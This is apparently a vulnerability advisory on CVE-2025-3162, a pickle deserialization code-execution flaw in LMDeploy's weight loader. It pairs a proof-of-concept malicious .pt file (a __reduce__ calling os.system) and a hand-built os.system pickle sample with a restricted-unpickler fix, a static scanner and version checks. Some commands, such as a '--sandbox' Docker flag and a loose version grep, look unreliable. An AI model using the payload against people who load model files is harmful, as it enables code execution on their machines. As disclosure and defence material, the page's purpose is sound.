How CVE-2025-3162 Works
The vulnerability exists in LMDeploy's PT file handler within lmdeploy/vl/model/utils.py. The `load_weight_ckpt` function does not validate serialized data while loading PyTorch model weights. An attacker can craft a malicious PT file containing arbitrary Python objects that execute during deserialization; because the function applies neither sandboxing nor object validation, the result is remote code execution. The attack vector is rated local because, in the typical deployment scenario, users load custom model weights themselves, which makes social engineering a viable way to deliver the file.
DailyCVE Form
Platform: LMDeploy
Version: <= 0.7.1
Vulnerability: Deserialization RCE
Severity: Critical
Date: 04/03/2025
What Undercode Say:
Exploit Analysis:
```python
import torch
import pickle

class Exploit:
    # pickle calls __reduce__ on load and invokes the returned callable with the given arguments
    def __reduce__(self):
        import os
        return (os.system, ('malicious_command',))

payload = {'weights': Exploit()}
torch.save(payload, 'malicious.pt')
```
Protection Commands:
```bash
# Verify file signatures before loading
gpg --verify model.pt.sig
# Use in isolated container
docker run --rm -v ./models:/models lmdeploy --sandbox
```
Mitigation Code:
```python
# Safe weight loading patch: allow-list the globals the unpickler may resolve
def safe_load_weights(path):
    import pickle
    from pickle import Unpickler

    class RestrictedUnpickler(Unpickler):
        def find_class(self, module, name):
            if module == 'torch' and name == 'Tensor':
                return super().find_class(module, name)
            raise pickle.UnpicklingError(f"Global '{module}.{name}' forbidden")

    # Operates on a raw pickle stream; a torch.save zip container must be opened to reach its data.pkl,
    # and torch.load(path, weights_only=True) applies an equivalent restriction for that format.
    with open(path, 'rb') as f:
        return RestrictedUnpickler(f).load()
```
Analytics:
- Attack Complexity: Low (pre-crafted file)
- Privileges Required: Low (user-level)
- CVSS Vector Breakdown: AV:L/AC:L/PR:L = Local access required
- Patch Status: Not yet available
Detection:
```bash
# Find vulnerable versions
pip show lmdeploy | grep "Version: 0.[0-7]."
```
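A static pre-load check that complements the version grep above and the restricted unpickler in the mitigation section, added here as an example that is neither this page's nor LMDeploy's code: it disassembles the pickle stream(s) inside a .pt file with pickletools and lists every global the file would import, so a checkpoint that reaches for os.system (the shape of the payload in the exploit analysis) is flagged without ever being unpickled. The allow-list, the helper names scan_checkpoint and make_pt, and the two sample blobs are assumptions constructed for this example.

```python
import io
import pickle
import pickletools
import zipfile
from collections import OrderedDict

# Allow-list for a plain state_dict checkpoint (an assumption for this example, not LMDeploy's own).
SAFE_GLOBALS = {("collections", "OrderedDict"), ("torch._utils", "_rebuild_tensor_v2"),
                ("torch", "FloatStorage"), ("torch", "HalfStorage"), ("torch", "BFloat16Storage")}
STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE"}

def pickle_globals(stream: bytes) -> set:
    """Every (module, name) the stream would import, found by disassembly, never by unpickling."""
    found, recent_strings = set(), []
    for op, arg, _pos in pickletools.genops(stream):
        if op.name == "GLOBAL":                  # protocol <= 3: arg is 'module name'
            found.add(tuple(arg.split(" ", 1)))
        elif op.name == "STACK_GLOBAL":          # protocol 4+: module, name pushed as strings
            if len(recent_strings) >= 2:         # (memo BINGET references are not resolved here)
                found.add((recent_strings[-2], recent_strings[-1]))
        if op.name in STRING_OPS:
            recent_strings.append(arg)
    return found

def scan_checkpoint(blob: bytes) -> set:
    """Globals in a .pt blob (torch zip container or raw pickle stream) that are not allow-listed."""
    if zipfile.is_zipfile(io.BytesIO(blob)):
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            streams = [zf.read(n) for n in zf.namelist() if n.endswith(".pkl")]
    else:
        streams = [blob]
    bad = set()
    for stream in streams:
        bad |= pickle_globals(stream) - SAFE_GLOBALS
    return bad

def make_pt(payload: bytes) -> bytes:
    """Constructed helper: wrap a pickle stream the way torch.save's zip container lays it out."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("archive/data.pkl", payload)
    return buf.getvalue()

# Constructed samples: a benign state_dict, and a hand-assembled stream with the shape of the
# __reduce__ payload above (GLOBAL os.system, one argument, REDUCE). Neither is ever unpickled.
BENIGN_PT = make_pt(pickle.dumps(OrderedDict(w=[1.0, 2.0]), protocol=2))
MALICIOUS_PT = make_pt(b"\x80\x02cos\nsystem\nX\x02\x00\x00\x00id\x85R.")
```

scan_checkpoint returns an empty set for BENIGN_PT and {('os', 'system')} for MALICIOUS_PT; anything non-empty should block the load and be logged before torch.load is ever called.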
Upgrade Command:
```bash
# When patched version available (quote the spec so the shell does not treat >= as a redirect)
pip install --upgrade "lmdeploy>=0.7.2"
```
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode